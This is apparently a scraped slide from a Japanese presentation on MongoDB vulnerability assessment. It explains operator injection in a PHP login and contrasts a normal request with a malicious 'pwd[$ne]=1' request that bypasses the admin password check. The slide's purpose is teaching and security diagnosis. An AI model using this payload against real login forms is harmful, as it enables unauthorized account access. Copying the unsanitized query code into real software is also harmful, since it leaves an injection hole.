More Related Content
Similar to MongoDBの脆弱性診断 - smarttechgeeks
Similar to MongoDBの脆弱性診断 - smarttechgeeks (17)
MongoDBの脆弱性診断 - smarttechgeeks
- 14. 演算子のインジェクションについて(2/3)
比較的、攻撃しやすい脆弱性なので詳しく解説します。
攻撃例について(PHPの場合)
※ $ne は、「≠(not equal)」です。
正常なリクエスト 不正なリクエスト
http://example.net/login.php?uid=admin&pwd=password http://example.net/login.php?uid=admin&pwd[$ne] =1
$user = $collection->find(array(
"uid" => $_GET[‘uid’], // admin
"pwd" => $_GET[‘pwd’], // password
));
結果、
adminでログイン可能
$user = $collection->find(array(
"uid" => $_GET[‘uid’], // admin,
"pwd" => $_GET[‘pwd’], //array("$ne" => 1)
));
結果、(adminのパスワードが1以外の場合)
adminでログイン可能